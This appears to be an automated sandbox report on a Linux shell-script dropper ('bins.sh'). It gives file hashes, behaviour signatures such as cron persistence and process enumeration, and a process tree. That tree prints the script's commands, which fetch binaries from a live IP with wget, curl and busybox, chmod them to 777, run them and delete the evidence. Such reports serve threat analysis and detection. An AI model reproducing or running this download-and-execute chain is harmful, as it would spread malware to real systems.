Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
26/11/2024, 17:01
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
6ba8a8748f75571967562756ca21b71b
-
SHA1
34882ed8e6e9809e322519be0ca0dbeb795757cd
-
SHA256
5afdb5bbac7f5d3c2277c891e250c851aaf1bcb7b5ae535c0b5579caee3a545e
-
SHA512
8a0e52f5a8a86784b50d71711349db2df0c00d16d9853a7a85a1b4a8511e710a50d5c250aa068b021ca81caafc7a2dff94f1ce4fc9a907f167e429b7185cb138
-
SSDEEP
96:TlKrZDjN2CwWm8WaiqKtIaBEgCbjpEF18XPNWmslWaiqKt0fZDjN2CUnaRQgF1KE:5Kr4Wm8WaidtIasJXlWmaWaidtSMU
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 714 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY 715 cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY -
Renames itself 1 IoCs
pid Process 716 cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.0C0p0m crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/17/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/662/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/801/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/844/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/899/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/756/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/797/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/824/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/862/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/896/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/9/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/607/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/655/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/764/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/841/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/847/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/888/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/42/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/729/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/738/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/787/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/806/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/810/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/839/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/885/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/41/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/742/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/791/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/852/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/853/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/880/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/881/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/891/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/327/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/811/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/833/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/858/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/864/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/887/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/2/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/795/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/823/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/873/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/895/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/111/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/737/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/758/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/863/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/893/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/114/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/295/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/776/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/817/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/837/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/843/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/851/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/25/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/654/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/800/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/874/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/897/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/898/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY File opened for reading /proc/self/auxv curl File opened for reading /proc/27/cmdline cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY curl File opened for modification /tmp/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY busybox File opened for modification /tmp/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:655
-
/bin/rm/bin/rm bins.sh2⤵PID:657
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY2⤵
- Writes file to tmp directory
PID:659
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:686
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY2⤵
- Writes file to tmp directory
PID:701
-
-
/bin/chmodchmod 777 cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY2⤵
- File and Directory Permissions Modification
PID:714
-
-
/tmp/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY./cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:715 -
/bin/shsh -c "crontab -l"3⤵PID:717
-
/usr/bin/crontabcrontab -l4⤵PID:719
-
-
-
/bin/shsh -c "crontab -"3⤵PID:721
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:722
-
-
-
-
/bin/rmrm cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY2⤵PID:738
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/G7l76kJ2JX6ltablJ94TRVornmZ5xy4VWS2⤵PID:742
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
210B
MD50319c7021f7a9f152357df696635d67a
SHA1788b20d2211f73bb2420706a691c1156c0489fe7
SHA25644043d7ae359508ca049c79812e5d1077d7dd27721a049b9da285156cf92f9ca
SHA512dda14e4ae1f31903fbec37cf13acc6a1c02573400b05ced505b4b197ccc5466e4bb5f0a0fc8061595e14fdedf87c0d6905b6d35a15e81e3767109b15f2e055fe